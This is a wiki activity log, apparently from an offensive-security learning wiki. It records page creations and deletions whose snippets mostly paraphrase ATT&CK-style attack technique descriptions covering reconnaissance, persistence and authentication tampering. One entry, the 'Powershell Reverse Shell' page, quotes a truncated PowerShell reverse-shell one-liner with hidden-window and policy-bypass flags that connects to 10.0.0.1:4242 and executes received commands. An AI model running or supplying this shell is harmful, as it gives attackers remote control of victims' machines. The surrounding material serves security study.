Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 12:14, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Compromise Accounts (content was: "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a...", and the only contributor was "Ali3nw3rx" (talk))
- 12:12, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Org Information (content was: "Attackers may collect information about the victim organization that can be used to identify potential targets. This information can include details about different divisions/departments, business operations, and key employees' roles and responsibilities. They may collect this information through various methods such as directly requesting it via phishing emails. The inf...", and the only contributor was "Ali3nw3rx" (talk))
- 12:12, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Network Information (content was: "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this information in various ways, such as direct collection acti...", and the only contributor was "Ali3nw3rx" (talk))
- 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Identity Information (content was: "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via Phish...", and the only contributor was "Ali3nw3rx" (talk))
- 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Host Information (content was: "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). Adversaries may gather this information in various ways...", and the only contributor was "Ali3nw3rx" (talk))
- 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Victim-Owned Websites (content was: "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.[1] Adversaries may search victim-owned websites to gather actionable informati...")
- 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Open Websites/Domains (content was: "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.[1][2][3] Adversaries may search in diff...", and the only contributor was "Ali3nw3rx" (talk))
- 12:10, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Open Technical Databases (content was: "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.[1][2][3][4][5][6][7] Adversa...", and the only contributor was "Ali3nw3rx" (talk))
- 12:10, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Closed Sources (content was: "Adversaries may gather information about victims from private, closed sources that can be used to identify potential targets. This information may be available for purchase from reputable sources such as paid subscriptions to feeds of technical/threat intelligence data, or from less reputable sources such as dark web or cybercrime black markets. They may search different...", and the only contributor was "Ali3nw3rx" (talk))
- 12:00, 28 January 2023 Ali3nw3rx talk contribs created page Ping (Created page with "Category:Active Scanning ==Description== Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings...")
- 11:33, 28 January 2023 Ali3nw3rx talk contribs created page User:Ali3nw3rx (Created page with "thumb")
- 11:31, 28 January 2023 Ali3nw3rx talk contribs created page File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
- 11:31, 28 January 2023 Ali3nw3rx talk contribs uploaded File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
- 11:15, 28 January 2023 Ali3nw3rx talk contribs created page Powershell Reverse Shell (Created page with " ==Powershell Reverse Shells== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";...") Tag: Visual edit
- 18:47, 26 January 2023 Ali3nw3rx talk contribs created page Template:Test page (Created page with "== This is our test page == == section 1 == === code we want to grab === == section 2 == === more code to grab === <syntaxhighlight> some random code </syntaxhighlight>")
- 18:39, 26 January 2023 SourMilk talk contribs created page Category:PwnTillDawn (Created page with "=Description= PwnTillDawn<ref>https://online.pwntilldawn.com/</ref> Online Battlefield is a penetration testing lab created by wizlynx group where participants can test their offensive security skills in a safe and legal environment, but also having fun! The goal is simple, break into as many machines as possible using a succession of weaknesses and vulnerabilities and collect flags to prove the successful exploitation. Each target machine that can be compromised contain...") Tag: Visual edit
- 18:23, 26 January 2023 Ali3nw3rx talk contribs created page Test cheat sheet (Created page with "enumeration")
- 18:00, 26 January 2023 Ali3nw3rx talk contribs created page Terminal Services DLL (Created page with "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.[1] Windows Services that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of wh...")
- 17:59, 26 January 2023 Ali3nw3rx talk contribs created page IIS Components (Created page with "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extens...")
- 17:55, 26 January 2023 Ali3nw3rx talk contribs created page Web Shell (Created page with "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.[1] In addition to a server-side script, a Web shell may have a client interface program that is used to...")
- 17:54, 26 January 2023 Ali3nw3rx talk contribs created page Transport Agent (Created page with "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.[1][2] Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequ...")
- 17:54, 26 January 2023 Ali3nw3rx talk contribs created page SQL Stored Procedures (Created page with "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). Adversaries may craft malicious stored procedures that can provide a pers...")
- 17:53, 26 January 2023 Ali3nw3rx talk contribs created page Category:Server Software Component (Created page with "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.[1] category: persistence")
- 17:50, 26 January 2023 Ali3nw3rx talk contribs created page TFTP Boot (Created page with "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network d...")
- 17:49, 26 January 2023 Ali3nw3rx talk contribs created page ROMMONkit (Created page with "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. [1][2] ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to TFTP Boot, an adversary may upgrade the ROMMON image locally or remotely (for exampl...")
- 17:49, 26 January 2023 Ali3nw3rx talk contribs created page Bootkit (Created page with "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [1] The MBR is the section of disk that is first loaded after completing hardware initialization...")
- 17:48, 26 January 2023 Ali3nw3rx talk contribs created page Component Firmware (Created page with "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking. Malicious component firmwar...")
- 17:48, 26 January 2023 Ali3nw3rx talk contribs created page System Firmware (Created page with "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. [1] [2] [3] System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicio...")
- 17:47, 26 January 2023 Ali3nw3rx talk contribs created page Category:Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
- 17:47, 26 January 2023 Ali3nw3rx talk contribs deleted page Pre-OS Boot (content was: "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (...", and the only contributor was "Ali3nw3rx" (talk))
- 17:47, 26 January 2023 Ali3nw3rx talk contribs created page Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
- 17:45, 26 January 2023 Ali3nw3rx talk contribs created page Add-ins (Created page with "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. [1] There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. [2][3] Ad...")
- 17:44, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Rules (Created page with "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.[1] Once mal...")
- 17:44, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Home Page (Created page with "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.[1] Once malicious home pages have been added to the user’s mailbox, th...")
- 17:43, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Forms (Created page with "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.[1] Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will e...")
- 17:43, 26 January 2023 Ali3nw3rx talk contribs created page Office Test (Created page with "Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office inst...")
- 17:42, 26 January 2023 Ali3nw3rx talk contribs created page Office Template Macros (Created page with "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. [1] Office Visual Basic for Applications (VBA) macros [2] can be inserted into the base template and used to execute code when the respective Office application starts in order to...")
- 17:41, 26 January 2023 Ali3nw3rx talk contribs created page Category:Office Application Startup (Created page with "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. A variety of features have been discovered in Outlook that can be abused to...")
- 17:40, 26 January 2023 Ali3nw3rx talk contribs created page Hybrid Identity (Created page with "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchro...")
- 17:40, 26 January 2023 Ali3nw3rx talk contribs created page Multi-Factor Authentication (Created page with "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as Multi-Factor Authentication Request Generation, adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as exclu...")
- 17:39, 26 January 2023 Ali3nw3rx talk contribs created page Reversible Encryption (Created page with "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.[1] If the property is enabl...")
- 17:38, 26 January 2023 Ali3nw3rx talk contribs created page Network Device Authentication (Created page with "Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. Modify System Image may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the...")
- 17:37, 26 January 2023 Ali3nw3rx talk contribs created page Pluggable Authentication Modules (Created page with "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.[1][2][3] Adversaries may modify components of the...")
- 17:36, 26 January 2023 Ali3nw3rx talk contribs created page Password Filter DLL (Created page with "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers f...")
- 17:35, 26 January 2023 Ali3nw3rx talk contribs created page Domain Controller Authentication (Created page with "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: Skeleton Key). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with...")
- 17:34, 26 January 2023 Ali3nw3rx talk contribs created page Category:Modify Authentication Process (Created page with "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating creden...")
- 17:33, 26 January 2023 Ali3nw3rx talk contribs created page Implant Internal Image (Created page with "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how t...")
- 17:33, 26 January 2023 Ali3nw3rx talk contribs created page KernelCallbackTable (Created page with "Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.[1][2] The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.[3] An adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modi...")
- 17:32, 26 January 2023 Ali3nw3rx talk contribs created page COR PROFILER (Created page with "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.[1][2] The COR_PROFILER environm...")
- 17:31, 26 January 2023 Ali3nw3rx talk contribs created page Services Registry Permissions Weakness (Created page with "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a ser...")